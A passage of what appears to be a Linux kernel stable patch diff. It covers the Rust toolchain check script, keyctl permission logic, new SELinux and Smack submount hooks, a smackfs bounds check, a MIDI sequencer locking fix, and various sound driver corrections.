++	echo >&2 "*** Rust compiler '$RUSTC' could not be found."
++	echo >&2 "***"
+ 	exit 1
+ fi
+ 
+ # Check that the Rust bindings generator exists.
+ if ! command -v "$BINDGEN" >/dev/null; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust bindings generator '$BINDGEN' could not be found."
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Rust bindings generator '$BINDGEN' could not be found."
++	echo >&2 "***"
+ 	exit 1
+ fi
+ 
+@@ -53,16 +47,14 @@ rust_compiler_min_version=$($min_tool_version rustc)
+ rust_compiler_cversion=$(get_canonical_version $rust_compiler_version)
+ rust_compiler_min_cversion=$(get_canonical_version $rust_compiler_min_version)
+ if [ "$rust_compiler_cversion" -lt "$rust_compiler_min_cversion" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust compiler '$RUSTC' is too old."
+-		echo >&2 "***   Your version:    $rust_compiler_version"
+-		echo >&2 "***   Minimum version: $rust_compiler_min_version"
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Rust compiler '$RUSTC' is too old."
++	echo >&2 "***   Your version:    $rust_compiler_version"
++	echo >&2 "***   Minimum version: $rust_compiler_min_version"
++	echo >&2 "***"
+ 	exit 1
+ fi
+-if [ "$1" = -v ] && [ "$rust_compiler_cversion" -gt "$rust_compiler_min_cversion" ]; then
++if [ "$rust_compiler_cversion" -gt "$rust_compiler_min_cversion" ]; then
+ 	echo >&2 "***"
+ 	echo >&2 "*** Rust compiler '$RUSTC' is too new. This may or may not work."
+ 	echo >&2 "***   Your version:     $rust_compiler_version"
+@@ -82,16 +74,14 @@ rust_bindings_generator_min_version=$($min_tool_version bindgen)
+ rust_bindings_generator_cversion=$(get_canonical_version $rust_bindings_generator_version)
+ rust_bindings_generator_min_cversion=$(get_canonical_version $rust_bindings_generator_min_version)
+ if [ "$rust_bindings_generator_cversion" -lt "$rust_bindings_generator_min_cversion" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust bindings generator '$BINDGEN' is too old."
+-		echo >&2 "***   Your version:    $rust_bindings_generator_version"
+-		echo >&2 "***   Minimum version: $rust_bindings_generator_min_version"
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Rust bindings generator '$BINDGEN' is too old."
++	echo >&2 "***   Your version:    $rust_bindings_generator_version"
++	echo >&2 "***   Minimum version: $rust_bindings_generator_min_version"
++	echo >&2 "***"
+ 	exit 1
+ fi
+-if [ "$1" = -v ] && [ "$rust_bindings_generator_cversion" -gt "$rust_bindings_generator_min_cversion" ]; then
++if [ "$rust_bindings_generator_cversion" -gt "$rust_bindings_generator_min_cversion" ]; then
+ 	echo >&2 "***"
+ 	echo >&2 "*** Rust bindings generator '$BINDGEN' is too new. This may or may not work."
+ 	echo >&2 "***   Your version:     $rust_bindings_generator_version"
+@@ -100,23 +90,39 @@ if [ "$1" = -v ] && [ "$rust_bindings_generator_cversion" -gt "$rust_bindings_ge
+ fi
+ 
+ # Check that the `libclang` used by the Rust bindings generator is suitable.
++#
++# In order to do that, first invoke `bindgen` to get the `libclang` version
++# found by `bindgen`. This step may already fail if, for instance, `libclang`
++# is not found, thus inform the user in such a case.
++bindgen_libclang_output=$( \
++	LC_ALL=C "$BINDGEN" $(dirname $0)/rust_is_available_bindgen_libclang.h 2>&1 >/dev/null
++) || bindgen_libclang_code=$?
++if [ -n "$bindgen_libclang_code" ]; then
++	echo >&2 "***"
++	echo >&2 "*** Running '$BINDGEN' to check the libclang version (used by the Rust"
++	echo >&2 "*** bindings generator) failed with code $bindgen_libclang_code. This may be caused by"
++	echo >&2 "*** a failure to locate libclang. See output and docs below for details:"
++	echo >&2 "***"
++	echo >&2 "$bindgen_libclang_output"
++	echo >&2 "***"
++	exit 1
++fi
++
++# `bindgen` returned successfully, thus use the output to check that the version
++# of the `libclang` found by the Rust bindings generator is suitable.
+ bindgen_libclang_version=$( \
+-	LC_ALL=C "$BINDGEN" $(dirname $0)/rust_is_available_bindgen_libclang.h 2>&1 >/dev/null \
+-		| grep -F 'clang version ' \
+-		| grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \
+-		| head -n 1 \
++	echo "$bindgen_libclang_output" \
++		| sed -nE 's:.*clang version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+ )
+ bindgen_libclang_min_version=$($min_tool_version llvm)
+ bindgen_libclang_cversion=$(get_canonical_version $bindgen_libclang_version)
+ bindgen_libclang_min_cversion=$(get_canonical_version $bindgen_libclang_min_version)
+ if [ "$bindgen_libclang_cversion" -lt "$bindgen_libclang_min_cversion" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN') is too old."
+-		echo >&2 "***   Your version:    $bindgen_libclang_version"
+-		echo >&2 "***   Minimum version: $bindgen_libclang_min_version"
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN') is too old."
++	echo >&2 "***   Your version:    $bindgen_libclang_version"
++	echo >&2 "***   Minimum version: $bindgen_libclang_min_version"
++	echo >&2 "***"
+ 	exit 1
+ fi
+ 
+@@ -125,21 +131,19 @@ fi
+ #
+ # In the future, we might be able to perform a full version check, see
+ # https://github.com/rust-lang/rust-bindgen/issues/2138.
+-if [ "$1" = -v ]; then
+-	cc_name=$($(dirname $0)/cc-version.sh "$CC" | cut -f1 -d' ')
+-	if [ "$cc_name" = Clang ]; then
+-		clang_version=$( \
+-			LC_ALL=C "$CC" --version 2>/dev/null \
+-				| sed -nE '1s:.*version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+-		)
+-		if [ "$clang_version" != "$bindgen_libclang_version" ]; then
+-			echo >&2 "***"
+-			echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN')"
+-			echo >&2 "*** version does not match Clang's. This may be a problem."
+-			echo >&2 "***   libclang version: $bindgen_libclang_version"
+-			echo >&2 "***   Clang version:    $clang_version"
+-			echo >&2 "***"
+-		fi
++cc_name=$($(dirname $0)/cc-version.sh $CC | cut -f1 -d' ')
++if [ "$cc_name" = Clang ]; then
++	clang_version=$( \
++		LC_ALL=C $CC --version 2>/dev/null \
++			| sed -nE '1s:.*version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
++	)
++	if [ "$clang_version" != "$bindgen_libclang_version" ]; then
++		echo >&2 "***"
++		echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN')"
++		echo >&2 "*** version does not match Clang's. This may be a problem."
++		echo >&2 "***   libclang version: $bindgen_libclang_version"
++		echo >&2 "***   Clang version:    $clang_version"
++		echo >&2 "***"
+ 	fi
+ fi
+ 
+@@ -150,11 +154,9 @@ rustc_sysroot=$("$RUSTC" $KRUSTFLAGS --print sysroot)
+ rustc_src=${RUST_LIB_SRC:-"$rustc_sysroot/lib/rustlib/src/rust/library"}
+ rustc_src_core="$rustc_src/core/src/lib.rs"
+ if [ ! -e "$rustc_src_core" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Source code for the 'core' standard library could not be found"
+-		echo >&2 "*** at '$rustc_src_core'."
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Source code for the 'core' standard library could not be found"
++	echo >&2 "*** at '$rustc_src_core'."
++	echo >&2 "***"
+ 	exit 1
+ fi
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 60a511c6b583e..c17660bf5f347 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -248,18 +248,6 @@ config IMA_APPRAISE_MODSIG
+ 	   The modsig keyword can be used in the IMA policy to allow a hook
+ 	   to accept such signatures.
+ 
+-config IMA_TRUSTED_KEYRING
+-	bool "Require all keys on the .ima keyring be signed (deprecated)"
+-	depends on IMA_APPRAISE && SYSTEM_TRUSTED_KEYRING
+-	depends on INTEGRITY_ASYMMETRIC_KEYS
+-	select INTEGRITY_TRUSTED_KEYRING
+-	default y
+-	help
+-	   This option requires that all keys added to the .ima
+-	   keyring be signed by a key on the system trusted keyring.
+-
+-	   This option is deprecated in favor of INTEGRITY_TRUSTED_KEYRING
+-
+ config IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY
+ 	bool "Permit keys validly signed by a built-in or secondary CA cert (EXPERIMENTAL)"
+ 	depends on SYSTEM_TRUSTED_KEYRING
+diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
+index d54f73c558f72..19be69fa4d052 100644
+--- a/security/keys/keyctl.c
++++ b/security/keys/keyctl.c
+@@ -980,14 +980,19 @@ long keyctl_chown_key(key_serial_t id, uid_t user, gid_t group)
+ 	ret = -EACCES;
+ 	down_write(&key->sem);
+ 
+-	if (!capable(CAP_SYS_ADMIN)) {
++	{
++		bool is_privileged_op = false;
++
+ 		/* only the sysadmin can chown a key to some other UID */
+ 		if (user != (uid_t) -1 && !uid_eq(key->uid, uid))
+-			goto error_put;
++			is_privileged_op = true;
+ 
+ 		/* only the sysadmin can set the key's GID to a group other
+ 		 * than one of those that the current process subscribes to */
+ 		if (group != (gid_t) -1 && !gid_eq(gid, key->gid) && !in_group_p(gid))
++			is_privileged_op = true;
++
++		if (is_privileged_op && !capable(CAP_SYS_ADMIN))
+ 			goto error_put;
+ 	}
+ 
+@@ -1088,7 +1093,7 @@ long keyctl_setperm_key(key_serial_t id, key_perm_t perm)
+ 	down_write(&key->sem);
+ 
+ 	/* if we're not the sysadmin, we can only change a key that we own */
+-	if (capable(CAP_SYS_ADMIN) || uid_eq(key->uid, current_fsuid())) {
++	if (uid_eq(key->uid, current_fsuid()) || capable(CAP_SYS_ADMIN)) {
+ 		key->perm = perm;
+ 		notify_key(key, NOTIFY_KEY_SETATTR, 0);
+ 		ret = 0;
+diff --git a/security/security.c b/security/security.c
+index 75dc0947ee0cf..5fa286ae9908d 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -882,6 +882,20 @@ void security_bprm_committed_creds(struct linux_binprm *bprm)
+ 	call_void_hook(bprm_committed_creds, bprm);
+ }
+ 
++/**
++ * security_fs_context_submount() - Initialise fc->security
++ * @fc: new filesystem context
++ * @reference: dentry reference for submount/remount
++ *
++ * Fill out the ->security field for a new fs_context.
++ *
++ * Return: Returns 0 on success or negative error code on failure.
++ */
++int security_fs_context_submount(struct fs_context *fc, struct super_block *reference)
++{
++	return call_int_hook(fs_context_submount, 0, fc, reference);
++}
++
+ int security_fs_context_dup(struct fs_context *fc, struct fs_context *src_fc)
+ {
+ 	return call_int_hook(fs_context_dup, 0, fc, src_fc);
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index f553c370397ee..26c9e4da4efcf 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -2766,6 +2766,27 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
+ 				   FILESYSTEM__UNMOUNT, NULL);
+ }
+ 
++static int selinux_fs_context_submount(struct fs_context *fc,
++				   struct super_block *reference)
++{
++	const struct superblock_security_struct *sbsec;
++	struct selinux_mnt_opts *opts;
++
++	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
++	if (!opts)
++		return -ENOMEM;
++
++	sbsec = selinux_superblock(reference);
++	if (sbsec->flags & FSCONTEXT_MNT)
++		opts->fscontext_sid = sbsec->sid;
++	if (sbsec->flags & CONTEXT_MNT)
++		opts->context_sid = sbsec->mntpoint_sid;
++	if (sbsec->flags & DEFCONTEXT_MNT)
++		opts->defcontext_sid = sbsec->def_sid;
++	fc->security = opts;
++	return 0;
++}
++
+ static int selinux_fs_context_dup(struct fs_context *fc,
+ 				  struct fs_context *src_fc)
+ {
+@@ -7263,6 +7284,7 @@ static struct security_hook_list selinux_hooks[] __lsm_ro_after_init = {
+ 	/*
+ 	 * PUT "CLONING" (ACCESSING + ALLOCATING) HOOKS HERE
+ 	 */
++	LSM_HOOK_INIT(fs_context_submount, selinux_fs_context_submount),
+ 	LSM_HOOK_INIT(fs_context_dup, selinux_fs_context_dup),
+ 	LSM_HOOK_INIT(fs_context_parse_param, selinux_fs_context_parse_param),
+ 	LSM_HOOK_INIT(sb_eat_lsm_opts, selinux_sb_eat_lsm_opts),
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index b6306d71c9088..67dcd31cd3f3d 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -611,6 +611,56 @@ out_opt_err:
+ 	return -EINVAL;
+ }
+ 
++/**
++ * smack_fs_context_submount - Initialise security data for a filesystem context
++ * @fc: The filesystem context.
++ * @reference: reference superblock
++ *
++ * Returns 0 on success or -ENOMEM on error.
++ */
++static int smack_fs_context_submount(struct fs_context *fc,
++				 struct super_block *reference)
++{
++	struct superblock_smack *sbsp;
++	struct smack_mnt_opts *ctx;
++	struct inode_smack *isp;
++
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
++	if (!ctx)
++		return -ENOMEM;
++	fc->security = ctx;
++
++	sbsp = smack_superblock(reference);
++	isp = smack_inode(reference->s_root->d_inode);
++
++	if (sbsp->smk_default) {
++		ctx->fsdefault = kstrdup(sbsp->smk_default->smk_known, GFP_KERNEL);
++		if (!ctx->fsdefault)
++			return -ENOMEM;
++	}
++
++	if (sbsp->smk_floor) {
++		ctx->fsfloor = kstrdup(sbsp->smk_floor->smk_known, GFP_KERNEL);
++		if (!ctx->fsfloor)
++			return -ENOMEM;
++	}
++
++	if (sbsp->smk_hat) {
++		ctx->fshat = kstrdup(sbsp->smk_hat->smk_known, GFP_KERNEL);
++		if (!ctx->fshat)
++			return -ENOMEM;
++	}
++
++	if (isp->smk_flags & SMK_INODE_TRANSMUTE) {
++		if (sbsp->smk_root) {
++			ctx->fstransmute = kstrdup(sbsp->smk_root->smk_known, GFP_KERNEL);
++			if (!ctx->fstransmute)
++				return -ENOMEM;
++		}
++	}
++	return 0;
++}
++
+ /**
+  * smack_fs_context_dup - Duplicate the security data on fs_context duplication
+  * @fc: The new filesystem context.
+@@ -4792,6 +4842,7 @@ static struct security_hook_list smack_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(ptrace_traceme, smack_ptrace_traceme),
+ 	LSM_HOOK_INIT(syslog, smack_syslog),
+ 
++	LSM_HOOK_INIT(fs_context_submount, smack_fs_context_submount),
+ 	LSM_HOOK_INIT(fs_context_dup, smack_fs_context_dup),
+ 	LSM_HOOK_INIT(fs_context_parse_param, smack_fs_context_parse_param),
+ 
+diff --git a/security/smack/smackfs.c b/security/smack/smackfs.c
+index 4b58526450d49..da7db9e22ce7c 100644
+--- a/security/smack/smackfs.c
++++ b/security/smack/smackfs.c
+@@ -896,7 +896,7 @@ static ssize_t smk_set_cipso(struct file *file, const char __user *buf,
+ 	}
+ 
+ 	ret = sscanf(rule, "%d", &catlen);
+-	if (ret != 1 || catlen > SMACK_CIPSO_MAXCATNUM)
++	if (ret != 1 || catlen < 0 || catlen > SMACK_CIPSO_MAXCATNUM)
+ 		goto out;
+ 
+ 	if (format == SMK_FIXED24_FMT &&
+diff --git a/sound/Kconfig b/sound/Kconfig
+index e56d96d2b11ca..1903c35d799e1 100644
+--- a/sound/Kconfig
++++ b/sound/Kconfig
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ menuconfig SOUND
+ 	tristate "Sound card support"
+-	depends on HAS_IOMEM
++	depends on HAS_IOMEM || UML
+ 	help
+ 	  If you have a sound card in your computer, i.e. if it can say more
+ 	  than an occasional beep, say Y.
+diff --git a/sound/core/pcm_compat.c b/sound/core/pcm_compat.c
+index 42c2ada8e8887..c96483091f30a 100644
+--- a/sound/core/pcm_compat.c
++++ b/sound/core/pcm_compat.c
+@@ -253,10 +253,14 @@ static int snd_pcm_ioctl_hw_params_compat(struct snd_pcm_substream *substream,
+ 		goto error;
+ 	}
+ 
+-	if (refine)
++	if (refine) {
+ 		err = snd_pcm_hw_refine(substream, data);
+-	else
++		if (err < 0)
++			goto error;
++		err = fixup_unreferenced_params(substream, data);
++	} else {
+ 		err = snd_pcm_hw_params(substream, data);
++	}
+ 	if (err < 0)
+ 		goto error;
+ 	if (copy_to_user(data32, data, sizeof(*data32)) ||
+diff --git a/sound/core/seq/oss/seq_oss_midi.c b/sound/core/seq/oss/seq_oss_midi.c
+index 07efb38f58ac1..f2940b29595f0 100644
+--- a/sound/core/seq/oss/seq_oss_midi.c
++++ b/sound/core/seq/oss/seq_oss_midi.c
+@@ -37,6 +37,7 @@ struct seq_oss_midi {
+ 	struct snd_midi_event *coder;	/* MIDI event coder */
+ 	struct seq_oss_devinfo *devinfo;	/* assigned OSSseq device */
+ 	snd_use_lock_t use_lock;
++	struct mutex open_mutex;
+ };
+ 
+ 
+@@ -172,6 +173,7 @@ snd_seq_oss_midi_check_new_port(struct snd_seq_port_info *pinfo)
+ 	mdev->flags = pinfo->capability;
+ 	mdev->opened = 0;
+ 	snd_use_lock_init(&mdev->use_lock);
++	mutex_init(&mdev->open_mutex);
+ 
+ 	/* copy and truncate the name of synth device */
+ 	strscpy(mdev->name, pinfo->name, sizeof(mdev->name));
+@@ -322,15 +324,17 @@ snd_seq_oss_midi_open(struct seq_oss_devinfo *dp, int dev, int fmode)
+ 	int perm;
+ 	struct seq_oss_midi *mdev;
+ 	struct snd_seq_port_subscribe subs;
++	int err;
+ 
+ 	mdev = get_mididev(dp, dev);
+ 	if (!mdev)
+ 		return -ENODEV;
+ 
++	mutex_lock(&mdev->open_mutex);
+ 	/* already used? */
+ 	if (mdev->opened && mdev->devinfo != dp) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return -EBUSY;
++		err = -EBUSY;
++		goto unlock;
+ 	}
+ 
+ 	perm = 0;
+@@ -340,14 +344,14 @@ snd_seq_oss_midi_open(struct seq_oss_devinfo *dp, int dev, int fmode)
+ 		perm |= PERM_READ;
+ 	perm &= mdev->flags;
+ 	if (perm == 0) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return -ENXIO;
++		err = -ENXIO;
++		goto unlock;
+ 	}
+ 
+ 	/* already opened? */
+ 	if ((mdev->opened & perm) == perm) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return 0;
++		err = 0;
++		goto unlock;
+ 	}
+ 
+ 	perm &= ~mdev->opened;
+@@ -372,13 +376,17 @@ snd_seq_oss_midi_open(struct seq_oss_devinfo *dp, int dev, int fmode)
+ 	}
+ 
+ 	if (! mdev->opened) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return -ENXIO;
++		err = -ENXIO;
++		goto unlock;
+ 	}
+ 
+ 	mdev->devinfo = dp;
++	err = 0;
++
++ unlock:
++	mutex_unlock(&mdev->open_mutex);
+ 	snd_use_lock_free(&mdev->use_lock);
+-	return 0;
++	return err;
+ }
+ 
+ /*
+@@ -393,10 +401,9 @@ snd_seq_oss_midi_close(struct seq_oss_devinfo *dp, int dev)
+ 	mdev = get_mididev(dp, dev);
+ 	if (!mdev)
+ 		return -ENODEV;
+-	if (! mdev->opened || mdev->devinfo != dp) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return 0;
+-	}
++	mutex_lock(&mdev->open_mutex);
++	if (!mdev->opened || mdev->devinfo != dp)
++		goto unlock;
+ 
+ 	memset(&subs, 0, sizeof(subs));
+ 	if (mdev->opened & PERM_WRITE) {
+@@ -415,6 +422,8 @@ snd_seq_oss_midi_close(struct seq_oss_devinfo *dp, int dev)
+ 	mdev->opened = 0;
+ 	mdev->devinfo = NULL;
+ 
++ unlock:
++	mutex_unlock(&mdev->open_mutex);
+ 	snd_use_lock_free(&mdev->use_lock);
+ 	return 0;
+ }
+diff --git a/sound/pci/ac97/ac97_codec.c b/sound/pci/ac97/ac97_codec.c
+index 534ea7a256ec3..606b318f34e56 100644
+--- a/sound/pci/ac97/ac97_codec.c
++++ b/sound/pci/ac97/ac97_codec.c
+@@ -2070,10 +2070,9 @@ int snd_ac97_mixer(struct snd_ac97_bus *bus, struct snd_ac97_template *template,
+ 		.dev_disconnect =	snd_ac97_dev_disconnect,
+ 	};
+ 
+-	if (!rac97)
+-		return -EINVAL;
+-	if (snd_BUG_ON(!bus || !template))
++	if (snd_BUG_ON(!bus || !template || !rac97))
+ 		return -EINVAL;
++	*rac97 = NULL;
+ 	if (snd_BUG_ON(template->num >= 4))
+ 		return -EINVAL;
+ 	if (bus->codec[template->num])
+diff --git a/sound/pci/hda/patch_cs8409.c b/sound/pci/hda/patch_cs8409.c
+index 0ba1fbcbb21e4..627899959ffe8 100644
+--- a/sound/pci/hda/patch_cs8409.c
++++ b/sound/pci/hda/patch_cs8409.c
+@@ -888,7 +888,7 @@ static void cs42l42_resume(struct sub_codec *cs42l42)
+ 
+ 	/* Initialize CS42L42 companion codec */
+ 	cs8409_i2c_bulk_write(cs42l42, cs42l42->init_seq, cs42l42->init_seq_num);
+-	usleep_range(30000, 35000);
++	msleep(CS42L42_INIT_TIMEOUT_MS);
+ 
+ 	/* Clear interrupts, by reading interrupt status registers */
+ 	cs8409_i2c_bulk_read(cs42l42, irq_regs, ARRAY_SIZE(irq_regs));
+diff --git a/sound/pci/hda/patch_cs8409.h b/sound/pci/hda/patch_cs8409.h
+index 2a8dfb4ff046b..937e9387abdc7 100644
+--- a/sound/pci/hda/patch_cs8409.h
++++ b/sound/pci/hda/patch_cs8409.h
+@@ -229,6 +229,7 @@ enum cs8409_coefficient_index_registers {
+ #define CS42L42_I2C_SLEEP_US			(2000)
+ #define CS42L42_PDN_TIMEOUT_US			(250000)
+ #define CS42L42_PDN_SLEEP_US			(2000)
++#define CS42L42_INIT_TIMEOUT_MS			(45)
+ #define CS42L42_FULL_SCALE_VOL_MASK		(2)
+ #define CS42L42_FULL_SCALE_VOL_0DB		(1)
+ #define CS42L42_FULL_SCALE_VOL_MINUS6DB		(0)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index aa475154c582f..f70e0ad81607e 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9591,7 +9591,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+-	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b97, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+diff --git a/sound/soc/atmel/atmel-i2s.c b/sound/soc/atmel/atmel-i2s.c
+index 425d66edbf867..5e43ff0b537a3 100644
+--- a/sound/soc/atmel/atmel-i2s.c
++++ b/sound/soc/atmel/atmel-i2s.c
+@@ -163,11 +163,14 @@ struct atmel_i2s_gck_param {
+ 
+ #define I2S_MCK_12M288		12288000UL
+ #define I2S_MCK_11M2896		11289600UL
++#define I2S_MCK_6M144		6144000UL
+ 
+ /* mck = (32 * (imckfs+1) / (imckdiv+1)) * fs */
+ static const struct atmel_i2s_gck_param gck_params[] = {
++	/* mck = 6.144Mhz */
++	{  8000, I2S_MCK_6M144,  1, 47},	/* mck =  768 fs */
++
+ 	/* mck = 12.288MHz */
+-	{  8000, I2S_MCK_12M288, 0, 47},	/* mck = 1536 fs */
+ 	{ 16000, I2S_MCK_12M288, 1, 47},	/* mck =  768 fs */
+ 	{ 24000, I2S_MCK_12M288, 3, 63},	/* mck =  512 fs */
+ 	{ 32000, I2S_MCK_12M288, 3, 47},	/* mck =  384 fs */
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 965ae55fa1607..0904827e2f3db 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -1552,6 +1552,7 @@ config SND_SOC_STA529
+ config SND_SOC_STAC9766
+ 	tristate
+ 	depends on SND_SOC_AC97_BUS
++	select REGMAP_AC97
+ 
+ config SND_SOC_STI_SAS
+ 	tristate "codec Audio support for STI SAS codec"
+diff --git a/sound/soc/codecs/cs43130.h b/sound/soc/codecs/cs43130.h
+index 1dd8936743132..90e8895275e77 100644
+--- a/sound/soc/codecs/cs43130.h
++++ b/sound/soc/codecs/cs43130.h
+@@ -381,88 +381,88 @@ struct cs43130_clk_gen {
+ 
+ /* frm_size = 16 */
+ static const struct cs43130_clk_gen cs43130_16_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 441,	10, }, },
+-	{ 22579200,	44100,		.v = { 32,	1, }, },
+-	{ 22579200,	48000,		.v = { 147,	5, }, },
+-	{ 22579200,	88200,		.v = { 16,	1, }, },
+-	{ 22579200,	96000,		.v = { 147,	10, }, },
+-	{ 22579200,	176400,		.v = { 8,	1, }, },
+-	{ 22579200,	192000,		.v = { 147,	20, }, },
+-	{ 22579200,	352800,		.v = { 4,	1, }, },
+-	{ 22579200,	384000,		.v = { 147,	40, }, },
+-	{ 24576000,	32000,		.v = { 48,	1, }, },
+-	{ 24576000,	44100,		.v = { 5120,	147, }, },
+-	{ 24576000,	48000,		.v = { 32,	1, }, },
+-	{ 24576000,	88200,		.v = { 2560,	147, }, },
+-	{ 24576000,	96000,		.v = { 16,	1, }, },
+-	{ 24576000,	176400,		.v = { 1280,	147, }, },
+-	{ 24576000,	192000,		.v = { 8,	1, }, },
+-	{ 24576000,	352800,		.v = { 640,	147, }, },
+-	{ 24576000,	384000,		.v = { 4,	1, }, },
++	{ 22579200,	32000,		.v = { 10,	441, }, },
++	{ 22579200,	44100,		.v = { 1,	32, }, },
++	{ 22579200,	48000,		.v = { 5,	147, }, },
++	{ 22579200,	88200,		.v = { 1,	16, }, },
++	{ 22579200,	96000,		.v = { 10,	147, }, },
++	{ 22579200,	176400,		.v = { 1,	8, }, },
++	{ 22579200,	192000,		.v = { 20,	147, }, },
++	{ 22579200,	352800,		.v = { 1,	4, }, },
++	{ 22579200,	384000,		.v = { 40,	147, }, },
++	{ 24576000,	32000,		.v = { 1,	48, }, },
++	{ 24576000,	44100,		.v = { 147,	5120, }, },
++	{ 24576000,	48000,		.v = { 1,	32, }, },
++	{ 24576000,	88200,		.v = { 147,	2560, }, },
++	{ 24576000,	96000,		.v = { 1,	16, }, },
++	{ 24576000,	176400,		.v = { 147,	1280, }, },
++	{ 24576000,	192000,		.v = { 1,	8, }, },
++	{ 24576000,	352800,		.v = { 147,	640, }, },
++	{ 24576000,	384000,		.v = { 1,	4, }, },
+ };
+ 
+ /* frm_size = 32 */
+ static const struct cs43130_clk_gen cs43130_32_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 441,	20, }, },
+-	{ 22579200,	44100,		.v = { 16,	1, }, },
+-	{ 22579200,	48000,		.v = { 147,	10, }, },
+-	{ 22579200,	88200,		.v = { 8,	1, }, },
+-	{ 22579200,	96000,		.v = { 147,	20, }, },
+-	{ 22579200,	176400,		.v = { 4,	1, }, },
+-	{ 22579200,	192000,		.v = { 147,	40, }, },
+-	{ 22579200,	352800,		.v = { 2,	1, }, },
+-	{ 22579200,	384000,		.v = { 147,	80, }, },
+-	{ 24576000,	32000,		.v = { 24,	1, }, },
+-	{ 24576000,	44100,		.v = { 2560,	147, }, },
+-	{ 24576000,	48000,		.v = { 16,	1, }, },
+-	{ 24576000,	88200,		.v = { 1280,	147, }, },
+-	{ 24576000,	96000,		.v = { 8,	1, }, },
+-	{ 24576000,	176400,		.v = { 640,	147, }, },
+-	{ 24576000,	192000,		.v = { 4,	1, }, },
+-	{ 24576000,	352800,		.v = { 320,	147, }, },
+-	{ 24576000,	384000,		.v = { 2,	1, }, },
++	{ 22579200,	32000,		.v = { 20,	441, }, },
++	{ 22579200,	44100,		.v = { 1,	16, }, },
++	{ 22579200,	48000,		.v = { 10,	147, }, },
++	{ 22579200,	88200,		.v = { 1,	8, }, },
++	{ 22579200,	96000,		.v = { 20,	147, }, },
++	{ 22579200,	176400,		.v = { 1,	4, }, },
++	{ 22579200,	192000,		.v = { 40,	147, }, },
++	{ 22579200,	352800,		.v = { 1,	2, }, },
++	{ 22579200,	384000,		.v = { 80,	147, }, },
++	{ 24576000,	32000,		.v = { 1,	24, }, },
++	{ 24576000,	44100,		.v = { 147,	2560, }, },
++	{ 24576000,	48000,		.v = { 1,	16, }, },
++	{ 24576000,	88200,		.v = { 147,	1280, }, },
++	{ 24576000,	96000,		.v = { 1,	8, }, },
++	{ 24576000,	176400,		.v = { 147,	640, }, },
++	{ 24576000,	192000,		.v = { 1,	4, }, },
++	{ 24576000,	352800,		.v = { 147,	320, }, },
++	{ 24576000,	384000,		.v = { 1,	2, }, },
+ };
+ 
+ /* frm_size = 48 */
+ static const struct cs43130_clk_gen cs43130_48_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 147,	100, }, },
+-	{ 22579200,	44100,		.v = { 32,	3, }, },
